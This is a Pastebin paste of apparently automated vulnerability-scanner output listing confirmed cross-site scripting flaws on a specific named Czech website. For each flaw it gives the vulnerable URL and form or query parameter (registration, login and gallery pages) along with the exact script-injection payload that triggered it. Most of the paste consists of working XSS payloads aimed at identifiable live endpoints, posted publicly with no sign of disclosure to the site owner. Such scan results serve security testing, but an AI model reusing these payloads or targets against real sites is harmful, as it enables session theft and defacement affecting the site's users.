Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: EMAIL
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0000A9)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: JMENO
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0000B0)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=b1&action=login
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: USERNAME
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0000D8)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: PRIJMENI
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0001B0)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=a2&action=sendreg
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: EMAIL
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0001B7)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: USERNAME
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0001C0)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/gallery/?folder="><script>alert(9)</script>&gname=Brigáda a rozehrávání 2011
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: folder
- Parameter Type: Querystring
- Attack Pattern: "><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/gallery/?folder=20111109-20110000_brigada-a-rozehravani-2011&gname='"--></style></script><script>alert(0x0002F9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: gname
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0002F9)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=b1&action=login
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: USERNAME
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0003A8)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img='"--></style></script><script>alert(0x0003B2)</script>&gname=BrigAÂ!da
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: img
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003B2)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img=20111109-20110000_brigada-a-rozehravani-2011/003.JPG&gname='"--></style></script><script>alert(0x0003B6)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: gname
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003B6)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img='"--></style></script><script>alert(0x0003BC)</script>&dalsi=1000&gname=BrigA!da
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: img
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003BC)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?img=20111109-20110000_brigada-a-rozehravani-2011/001.JPG&dalsi=1000&gname='"--></style></script><script>alert(0x0003D2)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: gname
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003D2)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?dalsi=1000&folder='"--></style></script><script>alert(0x0003E0)</script>&gname=BrigAÂ!da
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: folder
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003E0)</script>
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/pucika/gallery/index.php?dalsi=1000&folder=20111109-20110000_brigada-a-rozehravani-2011&gname='"--></style></script><script>alert(0x0003E1)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: gname
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003E1)</script>
- ||| Permanent Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=;ns:expression(netsparker(0x0000BA));&action=sendreg
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://pucika.zlatas.cz/?page=a1&action=reg
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: ;ns:expression(netsparker(0x0000BA));
- ||| [Possible] Permanent Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://pucika.zlatas.cz/?page=a1&action=reg
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://pucika.zlatas.cz/?page=a1&action=reg
- Parameter Name: EMAIL
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement